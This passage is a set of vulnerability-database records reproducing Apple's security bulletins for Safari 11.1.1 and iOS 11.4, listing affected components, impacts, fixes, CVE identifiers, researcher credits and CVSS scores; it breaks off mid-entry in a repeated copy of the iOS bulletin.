{"lastseen": "2020-12-24T20:41:58", "description": "## About Apple security updates\n\nFor our customers' protection, Apple doesn't disclose, discuss, or confirm security issues until an investigation has occurred and patches or releases are available. Recent releases are listed on the [Apple security updates](<https://support.apple.com/kb/HT201222>) page.\n\nFor more information about security, see the [Apple Product Security](<https://support.apple.com/kb/HT201220>) page. You can encrypt communications with Apple using the [Apple Product Security PGP Key](<https://support.apple.com/kb/HT201601>).\n\nApple security documents reference vulnerabilities by [CVE-ID](<http://cve.mitre.org/about/>) when possible.\n\n\n\n## Safari 11.1.1\n\nReleased June 1, 2018\n\n**Safari**\n\nAvailable for: OS X El Capitan 10.11.6, macOS Sierra 10.12.6, and macOS High Sierra 10.13.4\n\nImpact: A malicious website may be able to cause a denial of service\n\nDescription: A denial of service issue was addressed with improved validation.\n\nCVE-2018-4247: Fran\u00e7ois Renaud, Jesse Viviano of Verizon Enterprise Solutions\n\n**Safari**\n\nAvailable for: OS X El Capitan 10.11.6, macOS Sierra 10.12.6, and macOS High Sierra 10.13.4\n\nImpact: Visiting a malicious website may lead to address bar spoofing\n\nDescription: An inconsistent user interface issue was addressed with improved state management.\n\nCVE-2018-4205: xisigr of Tencent's Xuanwu Lab (tencent.com)\n\n**WebKit**\n\nAvailable for: OS X El Capitan 10.11.6, macOS Sierra 10.12.6, and macOS High Sierra 10.13.4\n\nImpact: Visiting a maliciously crafted website may lead to cookies being overwritten\n\nDescription: A permissions issue existed in the handling of web browser cookies. This issue was addressed with improved restrictions.\n\nCVE-2018-4232: an anonymous researcher, Aymeric Chaib\n\n**WebKit**\n\nAvailable for: OS X El Capitan 10.11.6, macOS Sierra 10.12.6, and macOS High Sierra 10.13.4\n\nImpact: Processing maliciously crafted web content may lead to arbitrary code execution\n\nDescription: A type confusion issue was addressed with improved memory handling.\n\nCVE-2018-4246: found by OSS-Fuzz\n\n**WebKit**\n\nAvailable for: OS X El Capitan 10.11.6, macOS Sierra 10.12.6, and macOS High Sierra 10.13.4\n\nImpact: Processing maliciously crafted web content may lead to arbitrary code execution\n\nDescription: A race condition was addressed with improved locking.\n\nCVE-2018-4192: Markus Gaasedelen, Amy Burnett, and Patrick Biernat of Ret2 Systems, Inc working with Trend Micro\u2019s Zero Day Initiative\n\nEntry updated October 8, 2019\n\n**WebKit**\n\nAvailable for: OS X El Capitan 10.11.6, macOS Sierra 10.12.6, and macOS High Sierra 10.13.4\n\nImpact: Visiting a malicious website may lead to address bar spoofing\n\nDescription: An inconsistent user interface issue was addressed with improved state management.\n\nCVE-2018-4188: YoKo Kho (@YoKoAcc) of Mitra Integrasi Informatika, PT\n\n**WebKit**\n\nAvailable for: OS X El Capitan 10.11.6, macOS Sierra 10.12.6, and macOS High Sierra 10.13.4\n\nImpact: Processing maliciously crafted web content may lead to an unexpected Safari crash\n\nDescription: A memory corruption issue was addressed with improved input validation.\n\nCVE-2018-4214: found by OSS-Fuzz\n\n**WebKit**\n\nAvailable for: OS X El Capitan 10.11.6, macOS Sierra 10.12.6, and macOS High Sierra 10.13.4\n\nImpact: Processing maliciously crafted web content may lead to arbitrary code execution\n\nDescription: Multiple memory corruption issues were addressed with improved memory handling.\n\nCVE-2018-4201: an anonymous researcher\n\nCVE-2018-4218: Natalie Silvanovich of Google Project Zero\n\nCVE-2018-4233: Samuel Gro\u00df (@5aelo) working with Trend Micro\u2019s Zero Day Initiative\n\n**WebKit**\n\nAvailable for: OS X El Capitan 10.11.6, macOS Sierra 10.12.6, and macOS High Sierra 10.13.4\n\nImpact: Processing maliciously crafted web content may lead to arbitrary code execution\n\nDescription: A buffer overflow issue was addressed with improved memory handling.\n\nCVE-2018-4199: Alex Plaskett, Georgi Geshev, and Fabi Beterke of MWR Labs working with Trend Micro\u2019s Zero Day Initiative\n\nEntry updated June 14, 2018\n\n**WebKit**\n\nAvailable for: OS X El Capitan 10.11.6, macOS Sierra 10.12.6, and macOS High Sierra 10.13.4\n\nImpact: Visiting a maliciously crafted website may leak sensitive data\n\nDescription: Credentials were unexpectedly sent when fetching CSS mask images. This was addressed by using a CORS-enabled fetch method.\n\nCVE-2018-4190: Jun Kokatsu (@shhnjk)\n\n**WebKit**\n\nAvailable for: OS X El Capitan 10.11.6, macOS Sierra 10.12.6, and macOS High Sierra 10.13.4\n\nImpact: Processing maliciously crafted web content may lead to arbitrary code execution\n\nDescription: An out-of-bounds read was addressed with improved input validation.\n\nCVE-2018-4222: Natalie Silvanovich of Google Project Zero\n\n**WebKit**\n\nAvailable for: OS X El Capitan 10.11.6, macOS Sierra 10.12.6, and macOS High Sierra 10.13.4\n\nImpact: Visiting a malicious website may lead to address bar spoofing\n\nDescription: A spoofing issue existed in the handling of URLs. This issue was addressed with improved input validation.\n\nCVE-2018-4277: xisigr of Tencent's Xuanwu Lab (tencent.com)\n\nEntry added July 10, 2018\n", "edition": 3, "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 8.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "userInteraction": "REQUIRED", "version": "3.0"}, "impactScore": 5.9}, "published": "2019-10-08T03:41:58", "title": "About the security content of Safari 11.1.1 - Apple Support", "type": "apple", "bulletinFamily": "software", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-4188", "CVE-2018-4205", "CVE-2018-4199", "CVE-2018-4190", "CVE-2018-4277", "CVE-2018-4233", "CVE-2018-4222", "CVE-2018-4192", "CVE-2018-4201", "CVE-2018-4218", "CVE-2018-4246", "CVE-2018-4214", "CVE-2018-4247", "CVE-2018-4232"], "modified": "2019-10-08T03:41:58", "id": "APPLE:HT208854", "href": "https://support.apple.com/kb/HT208854", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-12-24T20:44:12", "description": "## About Apple security updates\n\nFor our customers' protection, Apple doesn't disclose, discuss, or confirm security issues until an investigation has occurred and patches or releases are available. Recent releases are listed on the [Apple security updates](<https://support.apple.com/kb/HT201222>) page.\n\nFor more information about security, see the [Apple Product Security](<https://support.apple.com/kb/HT201220>) page. You can encrypt communications with Apple using the [Apple Product Security PGP Key](<https://support.apple.com/kb/HT201601>).\n\nApple security documents reference vulnerabilities by [CVE-ID](<http://cve.mitre.org/about/>) when possible.\n\n\n\n## iOS 11.4\n\nReleased May 29, 2018\n\n**Bluetooth**\n\nAvailable for: iPhone 5s and later, iPad Air and later, and iPod touch 6th generation\n\nImpact: A malicious application may be able to elevate privileges\n\nDescription: A buffer overflow was addressed with improved size validation.\n\nCVE-2018-4215: Abraham Masri (@cheesecakeufo)\n\n**Bluetooth**\n\nAvailable for: iPhone X, iPhone 8, iPhone 8 Plus, iPad 6th generation, and iPad Air 2\n\nNot impacted: HomePod\n\nImpact: An attacker in a privileged network position may be able to intercept Bluetooth traffic\n\nDescription: An input validation issue existed in Bluetooth. This issue was addressed with improved input validation.\n\nCVE-2018-5383: Lior Neumann and Eli Biham\n\nEntry added July 23, 2018\n\n**Contacts**\n\nAvailable for: iPhone 5s and later, iPad Air and later, and iPod touch 6th generation\n\nImpact: Processing a maliciously crafted vcf file may lead to a denial of service\n\nDescription: A validation issue existed in the handling of phone numbers. This issue was addressed with improved validation of phone numbers.\n\nCVE-2018-4100: Abraham Masri (@cheesecakeufo)\n\n**CoreGraphics**\n\nAvailable for: iPhone 5s and later, iPad Air and later, and iPod touch 6th generation\n\nImpact: Processing maliciously crafted web content may lead to arbitrary code execution\n\nDescription: An out-of-bounds read was addressed with improved input validation.\n\nCVE-2018-4194: Jihui Lu of Tencent KeenLab, Yu Zhou of Ant-financial Light-Year Security Lab\n\nEntry added June 21, 2018\n\n**Core Bluetooth**\n\nAvailable for: iPhone 5s and later, iPad Air and later, and iPod touch 6th generation\n\nImpact: An application may be able to execute arbitrary code with system privileges\n\nDescription: A memory corruption issue was addressed with improved memory handling.\n\nCVE-2018-4330: Apple\n\nEntry added August 8, 2018\n\n**FontParser**\n\nAvailable for: iPhone 5s and later, iPad Air and later, and iPod touch 6th generation\n\nImpact: Processing a maliciously crafted font file may lead to arbitrary code execution\n\nDescription: A memory corruption issue was addressed with improved validation.\n\nCVE-2018-4211: Proteas of Qihoo 360 Nirvan Team\n\n**iBooks**\n\nAvailable for: iPhone 5s and later, iPad Air and later, and iPod touch 6th generation\n\nImpact: An attacker in a privileged network position may be able to spoof password prompts in iBooks\n\nDescription: An input validation issue was addressed with improved input validation.\n\nCVE-2018-4202: Jerry Decime\n\n**Kernel**\n\nAvailable for: iPhone 5s and later, iPad Air and later, and iPod touch 6th generation\n\nImpact: An application may be able to execute arbitrary code with kernel privileges\n\nDescription: A buffer overflow was addressed with improved bounds checking.\n\nCVE-2018-4241: Ian Beer of Google Project Zero\n\nCVE-2018-4243: Ian Beer of Google Project Zero\n\n**Kernel**\n\nAvailable for: Apple TV 4K and Apple TV (4th generation)\n\nImpact: An application may be able to execute arbitrary code with kernel privileges\n\nDescription: A memory corruption issue was addressed with improved memory handling.\n\nCVE-2018-4249: Kevin Backhouse of Semmle Ltd.\n\nEntry updated October 8, 2019\n\n**libxpc**\n\nAvailable for: iPhone 5s and later, iPad Air and later, and iPod touch 6th generation\n\nImpact: An application may be able to gain elevated privileges\n\nDescription: A logic issue was addressed with improved validation.\n\nCVE-2018-4237: Samuel Gro\u00df (@5aelo) working with Trend Micro\u2019s Zero Day Initiative\n\n**libxpc**\n\nAvailable for: iPhone 5s and later, iPad Air and later, and iPod touch 6th generation\n\nImpact: An application may be able to execute arbitrary code with system privileges\n\nDescription: A memory corruption issue was addressed with improved memory handling.\n\nCVE-2018-4404: Samuel Gro\u00df (@5aelo) working with Trend Micro\u2019s Zero Day Initiative\n\nEntry added October 30, 2018\n\n**Magnifier**\n\nAvailable for: iPhone 5s and later, iPad Air and later, and iPod touch 6th generation\n\nImpact: A person with physical access to an iOS device may be able to view the last image used in Magnifier from the lockscreen\n\nDescription: A permissions issue existed in Magnifier. This was addressed with additional permission checks.\n\nCVE-2018-4239: an anonymous researcher\n\n**Mail**\n\nAvailable for: iPhone 5s and later, iPad Air and later, and iPod touch 6th generation\n\nImpact: An attacker may be able to exfiltrate the contents of S/MIME-encrypted e-mail\n\nDescription: An issue existed in the handling of encrypted Mail. This issue was addressed with improved isolation of MIME in Mail.\n\nCVE-2018-4227: Damian Poddebniak of M\u00fcnster University of Applied Sciences, Christian Dresen of M\u00fcnster University of Applied Sciences, Jens M\u00fcller of Ruhr University Bochum, Fabian Ising of M\u00fcnster University of Applied Sciences, Sebastian Schinzel of M\u00fcnster University of Applied Sciences, Simon Friedberger of KU Leuven, Juraj Somorovsky of Ruhr University Bochum, J\u00f6rg Schwenk of Ruhr University Bochum\n\n**Messages**\n\nAvailable for: iPhone 5s and later, iPad Air and later, and iPod touch 6th generation\n\nImpact: A local user may be able to conduct impersonation attacks\n\nDescription: An injection issue was addressed with improved input validation.\n\nCVE-2018-4235: Anurodh Pokharel of Salesforce.com\n\n**Messages**\n\nAvailable for: iPhone 5s and later, iPad Air and later, and iPod touch 6th generation\n\nImpact: Processing a maliciously crafted message may lead to a denial of service\n\nDescription: This issue was addressed with improved message validation.\n\nCVE-2018-4240: Sriram (@Sri_Hxor) of PrimeFort Pvt. Ltd\n\nCVE-2018-4250: Metehan Y\u0131lmaz of Sesim Sarpkaya\n\n**Safari**\n\nAvailable for: iPhone 5s and later, iPad Air and later, and iPod touch 6th generation\n\nImpact: A malicious website may be able to cause a denial of service\n\nDescription: A denial of service issue was addressed with improved validation.\n\nCVE-2018-4247: Fran\u00e7ois Renaud, Jesse Viviano of Verizon Enterprise Solutions\n\n**Security**\n\nAvailable for: iPhone 5s and later, iPad Air and later, and iPod touch 6th generation\n\nImpact: Users may be tracked by malicious websites using client certificates\n\nDescription: An issue existed in the handling of S-MIME certificates. This issue was addressed with improved validation of S-MIME certificates.\n\nCVE-2018-4221: Damian Poddebniak of M\u00fcnster University of Applied Sciences, Christian Dresen of M\u00fcnster University of Applied Sciences, Jens M\u00fcller of Ruhr University Bochum, Fabian Ising of M\u00fcnster University of Applied Sciences, Sebastian Schinzel of M\u00fcnster University of Applied Sciences, Simon Friedberger of KU Leuven, Juraj Somorovsky of Ruhr University Bochum, J\u00f6rg Schwenk of Ruhr University Bochum\n\n**Security**\n\nAvailable for: iPhone 5s and later, iPad Air and later, and iPod touch 6th generation\n\nImpact: A local user may be able to read a persistent account identifier\n\nDescription: An authorization issue was addressed with improved state management.\n\nCVE-2018-4223: Abraham Masri (@cheesecakeufo)\n\n**Security**\n\nAvailable for: iPhone 5s and later, iPad Air and later, and iPod touch 6th generation\n\nImpact: A local user may be able to read a persistent device identifier\n\nDescription: An authorization issue was addressed with improved state management.\n\nCVE-2018-4224: Abraham Masri (@cheesecakeufo)\n\n**Security**\n\nAvailable for: iPhone 5s and later, iPad Air and later, and iPod touch 6th generation\n\nImpact: A local user may be able to modify the state of the Keychain\n\nDescription: An authorization issue was addressed with improved state management.\n\nCVE-2018-4225: Abraham Masri (@cheesecakeufo)\n\n**Security**\n\nAvailable for: iPhone 5s and later, iPad Air and later, and iPod touch 6th generation\n\nImpact: A local user may be able to view sensitive user information\n\nDescription: An authorization issue was addressed with improved state management.\n\nCVE-2018-4226: Abraham Masri (@cheesecakeufo)\n\n**Siri**\n\nAvailable for: iPhone 5s and later, iPad Air and later, and iPod touch 6th generation\n\nImpact: A person with physical access to an iOS device may be able to enable Siri from the lock screen\n\nDescription: An issue existed with Siri permissions. This was addressed with improved permission checking.\n\nCVE-2018-4238: Baljinder Singh, Muhammad khizer javed, Onur Can BIKMAZ (@CanBkmaz) of Mustafa Kemal University\n\n**Siri**\n\nAvailable for: iPhone 5s and later, iPad Air and later, and iPod touch 6th generation\n\nImpact: A person with physical access to an iOS device may be able to use Siri to read notifications of content that is set not to be displayed at the lock screen\n\nDescription: An issue existed with Siri permissions. This was addressed with improved permission checking.\n\nCVE-2018-4252: Hunter Byrnes, Martin Winkelmann (@Winkelmannnn)\n\n**Siri Contacts**\n\nAvailable for: iPhone 5s and later, iPad Air and later, and iPod touch 6th generation\n\nImpact: An attacker with physical access to a device may be able to see private contact information\n\nDescription: An issue existed with Siri permissions. This was addressed with improved permission checking.\n\nCVE-2018-4244: an anonymous researcher\n\n**UIKit**\n\nAvailable for: iPhone 5s and later, iPad Air and later, and iPod touch 6th generation\n\nImpact: Processing a maliciously crafted text file may lead to a denial of service\n\nDescription: A validation issue existed in the handling of text. This issue was addressed with improved validation of text.\n\nCVE-2018-4198: Hunter Byrnes\n\n**WebKit**\n\nAvailable for: iPhone 5s and later, iPad Air and later, and iPod touch 6th generation\n\nImpact: Visiting a malicious website may lead to address bar spoofing\n\nDescription: An inconsistent user interface issue was addressed with improved state management.\n\nCVE-2018-4188: YoKo Kho (@YoKoAcc) of Mitra Integrasi Informatika, PT\n\n**WebKit**\n\nAvailable for: iPhone 5s and later, iPad Air and later, and iPod touch 6th generation\n\nImpact: Processing maliciously crafted web content may lead to arbitrary code execution\n\nDescription: Multiple memory corruption issues were addressed with improved memory handling.\n\nCVE-2018-4201: an anonymous researcher\n\nCVE-2018-4218: Natalie Silvanovich of Google Project Zero\n\nCVE-2018-4233: Samuel Gro\u00df (@5aelo) working with Trend Micro\u2019s Zero Day Initiative\n\n**WebKit**\n\nAvailable for: iPhone 5s and later, iPad Air and later, and iPod touch 6th generation\n\nImpact: Processing maliciously crafted web content may lead to arbitrary code execution\n\nDescription: A buffer overflow issue was addressed with improved memory handling.\n\nCVE-2018-4199: Alex Plaskett, Georgi Geshev, and Fabi Beterke of MWR Labs working with Trend Micro\u2019s Zero Day Initiative\n\nEntry updated June 14, 2018\n\n**WebKit**\n\nAvailable for: iPhone 5s and later, iPad Air and later, and iPod touch 6th generation\n\nImpact: Visiting a maliciously crafted website may lead to cookies being overwritten\n\nDescription: A permissions issue existed in the handling of web browser cookies. This issue was addressed with improved restrictions.\n\nCVE-2018-4232: an anonymous researcher, Aymeric Chaib\n\n**WebKit**\n\nAvailable for: iPhone 5s and later, iPad Air and later, and iPod touch 6th generation\n\nImpact: Processing maliciously crafted web content may lead to arbitrary code execution\n\nDescription: A race condition was addressed with improved locking.\n\nCVE-2018-4192: Markus Gaasedelen, Amy Burnett, and Patrick Biernat of Ret2 Systems, Inc working with Trend Micro\u2019s Zero Day Initiative\n\nEntry updated October 8, 2019\n\n**WebKit**\n\nAvailable for: iPhone 5s and later, iPad Air and later, and iPod touch 6th generation\n\nImpact: Processing maliciously crafted web content may lead to an unexpected Safari crash\n\nDescription: A memory corruption issue was addressed with improved input validation.\n\nCVE-2018-4214: found by OSS-Fuzz\n\n**WebKit**\n\nAvailable for: iPhone 5s and later, iPad Air and later, and iPod touch 6th generation\n\nImpact: Processing maliciously crafted web content may lead to arbitrary code execution\n\nDescription: A memory corruption issue was addressed with improved memory handling.\n\nCVE-2018-4204: found by OSS-Fuzz, Richard Zhu (fluorescence) working with Trend Micro's Zero Day Initiative\n\n**WebKit**\n\nAvailable for: iPhone 5s and later, iPad Air and later, and iPod touch 6th generation\n\nImpact: Processing maliciously crafted web content may lead to arbitrary code execution\n\nDescription: A type confusion issue was addressed with improved memory handling.\n\nCVE-2018-4246: found by OSS-Fuzz\n\n**WebKit**\n\nAvailable for: iPhone 5s and later, iPad Air and later, and iPod touch 6th generation\n\nImpact: Visiting a maliciously crafted website may leak sensitive data\n\nDescription: Credentials were unexpectedly sent when fetching CSS mask images. This was addressed by using a CORS-enabled fetch method.\n\nCVE-2018-4190: Jun Kokatsu (@shhnjk)\n\n**WebKit**\n\nAvailable for: iPhone 5s and later, iPad Air and later, and iPod touch 6th generation\n\nImpact: Processing maliciously crafted web content may lead to arbitrary code execution\n\nDescription: An out-of-bounds read was addressed with improved input validation.\n\nCVE-2018-4222: Natalie Silvanovich of Google Project Zero\n", "edition": 3, "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 7.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "userInteraction": "REQUIRED", "version": "3.0"}, "impactScore": 5.9}, "published": "2019-10-08T03:21:43", "title": "About the security content of iOS 11.4 - Apple Support", "type": "apple", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-4211", "CVE-2018-4252", "CVE-2018-4223", "CVE-2018-4100", "CVE-2018-4227", "CVE-2018-4239", "CVE-2018-4225", "CVE-2018-4194", "CVE-2018-4188", "CVE-2018-4250", "CVE-2018-4199", "CVE-2018-4202", "CVE-2018-4330", "CVE-2018-4238", "CVE-2018-4224", "CVE-2018-4404", "CVE-2018-4190", "CVE-2018-4221", "CVE-2018-4233", "CVE-2018-4241", "CVE-2018-4198", "CVE-2018-4237", "CVE-2018-4222", "CVE-2018-4192", "CVE-2018-4235", "CVE-2018-4204", "CVE-2018-4201", "CVE-2018-4218", "CVE-2018-4246", "CVE-2018-4249", "CVE-2018-4214", "CVE-2018-4240", "CVE-2018-5383", "CVE-2018-4247", "CVE-2018-4232", "CVE-2018-4244", "CVE-2018-4215", "CVE-2018-4243", "CVE-2018-4226"], "modified": "2019-10-08T03:21:43", "id": "APPLE:HT208848", "href": "https://support.apple.com/kb/HT208848", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-02-19T19:30:49", "description": "# About the security content of iOS 11.4\n\nThis document describes the security content of iOS 11.4.\n\n## About Apple security updates\n\nFor our customers' protection, Apple doesn't disclose, discuss, or confirm security issues until an investigation has occurred and patches or releases are available. Recent releases are listed on the [Apple security updates](<https://support.apple.com/kb/HT201222>) page.\n\nFor more information about security, see the [Apple Product Security](<https://support.apple.com/kb/HT201220>) page. You can encrypt communications with Apple using the [Apple Product Security PGP Key](<https://support.apple.com/kb/HT201601>).\n\nApple security documents reference vulnerabilities by [CVE-ID](<http://cve.mitre.org/about/>) when possible.\n\n\n\n## iOS 11.4\n\nReleased May 29, 2018\n\n**Bluetooth**\n\nAvailable for: iPhone 5s and later, iPad Air and later, and iPod touch 6th generation\n\nImpact: A malicious application may be able to elevate privileges\n\nDescription: A buffer overflow was addressed with improved size validation.\n\nCVE-2018-4215: Abraham Masri (@cheesecakeufo)\n\n**Bluetooth**\n\nAvailable for: iPhone X, iPhone 8, iPhone 8 Plus, iPad 6th generation, and iPad Air 2\n\nNot impacted: HomePod\n\nImpact: An attacker in a privileged network position may be able to intercept Bluetooth traffic\n\nDescription: An input validation issue existed in Bluetooth. This issue was addressed with improved input validation.\n\nCVE-2018-5383: Lior Neumann and Eli Biham\n\nEntry added July 23, 2018\n\n**Contacts**\n\nAvailable for: iPhone 5s and later, iPad Air and later, and iPod touch 6th generation\n\nImpact: Processing a maliciously crafted vcf file may lead to a denial of service\n\nDescription: A validation issue existed in the handling of phone numbers. This issue was addressed with improved validation of phone numbers.\n\nCVE-2018-4100: Abraham Masri (@cheesecakeufo)\n\n**CoreGraphics**\n\nAvailable for: iPhone 5s and later, iPad Air and later, and iPod touch 6th generation\n\nImpact: Processing maliciously crafted web content may lead to arbitrary code execution\n\nDescription: An out-of-bounds read was addressed with improved input validation.\n\nCVE-2018-4194: Jihui Lu of Tencent KeenLab, Yu Zhou of Ant-financial Light-Year Security Lab\n\nEntry added June 21, 2018\n\n**Core Bluetooth**\n\nAvailable for: iPhone 5s and later, iPad Air and later, and iPod touch 6th generation\n\nImpact: An application may be able to execute arbitrary code with system privileges\n\nDescription: A memory corruption issue was addressed with improved memory handling.\n\nCVE-2018-4330: Apple\n\nEntry added August 8, 2018\n\n**FontParser**\n\nAvailable for: iPhone 5s and later, iPad Air and later, and iPod touch 6th generation\n\nImpact: Processing a maliciously crafted font file may lead to arbitrary code execution\n\nDescription: A memory corruption issue was addressed with improved validation.\n\nCVE-2018-4211: Proteas of Qihoo 360 Nirvan Team\n\n**iBooks**\n\nAvailable for: iPhone 5s and later, iPad Air and later, and iPod touch 6th generation\n\nImpact: An attacker in a privileged network position may be able to spoof password prompts in iBooks\n\nDescription: An input validation issue was addressed with improved input validation.\n\nCVE-2018-4202: Jerry Decime\n\n**Kernel**\n\nAvailable for: iPhone 5s and later, iPad Air and later, and iPod touch 6th generation\n\nImpact: An application may be able to execute arbitrary code with kernel privileges\n\nDescription: A buffer overflow was addressed with improved bounds checking.\n\nCVE-2018-4241: Ian Beer of Google Project Zero\n\nCVE-2018-4243: Ian Beer of Google Project Zero\n\n**Kernel**\n\nAvailable for: Apple TV 4K and Apple TV (4th generation)\n\nImpact: An application may be able to execute arbitrary code with kernel privileges\n\nDescription: A memory corruption issue was addressed with improved memory handling.\n\nCVE-2018-4249: Kevin Backhouse of Semmle Ltd.\n\nEntry updated October 8, 2019\n\n**libxpc**\n\nAvailable for: iPhone 5s and later, iPad Air and later, and iPod touch 6th generation\n\nImpact: An application may be able to gain elevated privileges\n\nDescription: A logic issue was addressed with improved validation.\n\nCVE-2018-4237: Samuel Gro\u00df (@5aelo) working with Trend Micro\u2019s Zero Day Initiative\n\n**libxpc**\n\nAvailable for: iPhone 5s and later, iPad Air and later, and iPod touch 6th generation\n\nImpact: An application may be able to execute arbitrary code with system privileges\n\nDescription: A memory corruption issue was addressed with improved memory handling.\n\nCVE-2018-4404: Samuel Gro\u00df (@5aelo) working with Trend Micro\u2019s Zero Day Initiative\n\nEntry added October 30, 2018\n\n**Magnifier**\n\nAvailable for: iPhone 5s and later, iPad Air and later, and iPod touch 6th generation\n\nImpact: A person with physical access to an iOS device may be able to view the last image used in Magnifier from the lockscreen\n\nDescription: A permissions issue existed in Magnifier. This was addressed with additional permission checks.\n\nCVE-2018-4239: an anonymous researcher\n\n**Mail**\n\nAvailable for: iPhone 5s and later, iPad Air and later, and iPod touch 6th generation\n\nImpact: An attacker may be able to exfiltrate the contents of S/MIME-encrypted e-mail\n\nDescription: An issue existed in the handling of encrypted Mail. This issue was addressed with improved isolation of MIME in Mail.\n\nCVE-2018-4227: Damian Poddebniak of M\u00fcnster University of Applied Sciences, Christian Dresen of M\u00fcnster University of Applied Sciences, Jens M\u00fcller of Ruhr University Bochum, Fabian Ising of M\u00fcnster University of Applied Sciences, Sebastian Schinzel of M\u00fcnster University of Applied Sciences, Simon Friedberger of KU Leuven, Juraj Somorovsky of Ruhr University Bochum, J\u00f6rg Schwenk of Ruhr University Bochum\n\n**Messages**\n\nAvailable for: iPhone 5s and later, iPad Air and later, and iPod touch 6th generation\n\nImpact: A local user may be able to conduct impersonation attacks\n\nDescription: An injection issue was addressed with improved input validation.\n\nCVE-2018-4235: Anurodh Pokharel of Salesforce.com\n\n**Messages**\n\nAvailable for: iPhone 5s and later, iPad Air and later, and iPod touch 6th generation\n\nImpact: Processing a maliciously crafted message may lead to a denial of service\n\nDescription: This issue was addressed with improved message validation.\n\nCVE-2018-4240: Sriram (@Sri_Hxor) of PrimeFort Pvt. Ltd\n\nCVE-2018-4250: Metehan Y\u0131lmaz of Sesim Sarpkaya\n\n**Safari**\n\nAvailable for: iPhone 5s and later, iPad Air and later, and iPod touch 6th generation\n\nImpact: A malicious website may be able to cause a denial of service\n\nDescription: A denial of service issue was addressed with improved validation.\n\nCVE-2018-4247: Fran\u00e7ois Renaud, Jesse Viviano of Verizon Enterprise Solutions\n\n**Security**\n\nAvailable for: iPhone 5s and later, iPad Air and later, and iPod touch 6th generation\n\nImpact: Users may be tracked by malicious websites using client certificates\n\nDescription: An issue existed in the handling of S-MIME certificates. This issue was addressed with improved validation of S-MIME certificates.\n\nCVE-2018-4221: Damian Poddebniak of M\u00fcnster University of Applied Sciences, Christian Dresen of M\u00fcnster University of Applied Sciences, Jens M\u00fcller of Ruhr University Bochum, Fabian Ising of M\u00fcnster University of Applied Sciences, Sebastian Schinzel of M\u00fcnster University of Applied Sciences, Simon Friedberger of KU Leuven, Juraj Somorovsky of Ruhr University Bochum, J\u00f6rg Schwenk of Ruhr University Bochum\n\n**Security**\n\nAvailable for: iPhone 5s and later, iPad Air and later, and iPod touch 6th generation\n\nImpact: A local user may be able to read a persistent account identifier\n\nDescription: An authorization issue was addressed with improved state management.\n\nCVE-2018-4223: Abraham Masri (@cheesecakeufo)\n\n**Security**\n\nAvailable for: iPhone 5s and later, iPad Air and later, and iPod touch 6th generation\n\nImpact: A local user may be able to read a persistent device identifier\n\nDescription: An authorization issue was addressed with improved state management.\n\nCVE-2018-4224: Abraham Masri (@cheesecakeufo)\n\n**Security**\n\nAvailable for: iPhone 5s and later, iPad Air and later, and iPod touch 6th generation\n\nImpact: A local user may be able to modify the state of the Keychain\n\nDescription: An authorization issue was addressed with improved state management.\n\nCVE-2018-4225: Abraham Masri (@cheesecakeufo)\n\n**Security**\n\nAvailable for: iPhone 5s and later, iPad Air and later, and iPod touch 6th generation\n\nImpact: A local user may be able to view sensitive user information\n\nDescription: An authorization issue was addressed with improved state management.\n\nCVE-2018-4226: Abraham Masri (@cheesecakeufo)\n\n**Siri**\n\nAvailable for: iPhone 5s and later, iPad Air and later, and iPod touch 6th generation\n\nImpact: A person with physical access to an iOS device may be able to enable Siri from the lock screen\n\nDescription: An issue existed with Siri permissions. This was addressed with improved permission checking.\n\nCVE-2018-4238: Baljinder Singh, Muhammad khizer javed, Onur Can BIKMAZ (@CanBkmaz) of Mustafa Kemal University\n\n**Siri**\n\nAvailable for: iPhone 5s and later, iPad Air and later, and iPod touch 6th generation\n\nImpact: A person with physical access to an iOS device may be able to use Siri to read notifications of content that is set not to be displayed at the lock screen\n\nDescription: An issue existed with Siri permissions. This was addressed with improved permission checking.\n\nCVE-2018-4252: Hunter Byrnes, Martin Winkelmann (@Winkelmannnn)\n\n**Siri Contacts**\n\nAvailable for: iPhone 5s and later, iPad Air and later, and iPod touch 6th generation\n\nImpact: An attacker with physical access to a device may be able to see private contact information\n\nDescription: An issue existed with Siri permissions. This was addressed with improved permission checking.\n\nCVE-2018-4244: an anonymous researcher\n\n**UIKit**\n\nAvailable for: iPhone 5s and later, iPad Air and later, and iPod touch 6th generation\n\nImpact: Processing a maliciously crafted text file may lead to a denial of service\n\nDescription: A validation issue existed in the handling of text. This issue was addressed with improved validation of text.\n\nCVE-2018-4198: Hunter Byrnes\n\n**WebKit**\n\nAvailable for: iPhone 5s and later, iPad Air and later, and iPod touch 6th generation\n\nImpact: Visiting a malicious website may lead to address bar 